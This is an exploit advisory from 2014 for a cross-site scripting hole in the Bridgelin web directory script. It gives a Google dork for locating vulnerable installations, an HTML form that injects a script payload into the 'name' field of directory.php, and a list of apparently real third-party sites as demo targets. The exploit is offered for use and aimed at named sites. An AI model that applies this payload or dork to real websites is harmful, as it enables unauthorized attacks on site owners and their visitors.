#############################################################
# Exploit Title: Bridgelin Cross Site Scripting Vulnerability
# Date: 05-01-2014
# Author: SoUiLaHxXx_Dz
# Vendor: www.bridgelin.com
# Category: webapps
# Google DorK: inurl:"/directory.php" powered by Bridgelin
# Tested on: Win Xp
#############################################################
ExPloiT:
<form action="http://127.0.0.1/[path]/directory.php" method="post">
<input type="text" name="name" value="<script>alert('By SoUiLaHxXx_Dz')</script>">
<INPUT TYPE='hidden' NAME='type' VALUE='name'>
<INPUT TYPE='hidden' NAME='r_name' VALUE='- Name'>
<input type="submit" value="Test..!"></form>
Demo :
http://bridgXelin.co/directory.php
http://naberXnet-ds4.com/directory.php
http://bridgeXin-demo.com/directory.php